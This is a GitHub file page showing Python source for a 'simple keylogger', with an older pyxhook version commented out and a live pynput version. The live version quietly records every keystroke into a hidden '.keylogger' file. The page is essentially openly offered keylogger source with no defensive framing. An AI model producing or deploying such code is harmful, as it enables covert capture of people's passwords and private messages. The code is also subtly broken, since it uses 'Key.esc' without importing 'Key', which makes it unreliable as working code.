-
Notifications
You must be signed in to change notification settings - Fork 612
/
Copy pathP79_SimplePythonKeylogger.py
71 lines (58 loc) · 1.83 KB
/
P79_SimplePythonKeylogger.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# Author: OMKAR PATHAK
# This file requires two modules to be installed:
# 1. pyxhook.py: file is provided in the folder itself
# 2. Xlib: sudo pip3 install python3-Xlib
'''import pyxhook
import time
# functions to write a newline character into the file
def newline():
file = open('.keylogger', 'a')
file.write('\n')
file.close()
# This function is called every time a key is pressed
def key_press_event(event):
global running
# write the key pressed into a file
if event.Key != 'space' and event.Key != 'Escape':
with open('.keylogger', 'a+') as File:
File.write(event.Key)
# If the ascii value matches spacebar, add a newline in the file
if event.Key == 'space':
newline()
# If the ascii value matches escape, terminate the while loop
if event.Key == 'Escape':
running = False
newline()
if __name__ == '__main__':
# Create hookmanager
hookman = pyxhook.HookManager()
# Define our callback to fire when a key is pressed down
hookman.KeyDown = key_press_event
# Hook the keyboard
hookman.HookKeyboard()
# Start our listener
hookman.start()
# Create a loop to keep the application running
running = True
while running:
time.sleep(0.1)
# Close the listener when we are done
hookman.cancel()
'''
from pynput.keyboard import Listener
# Functions to handle key press and release events
def on_key_press(key):
try:
with open('.keylogger', 'a') as f:
f.write(str(key.char))
except AttributeError:
# Handle special keys
with open('.keylogger', 'a') as f:
f.write(str(key))
def on_key_release(key):
if key == Key.esc:
# Terminate the listener
return False
# Create a listener for both key press and release events
with Listener(on_press=on_key_press, on_release=on_key_release) as listener:
listener.join()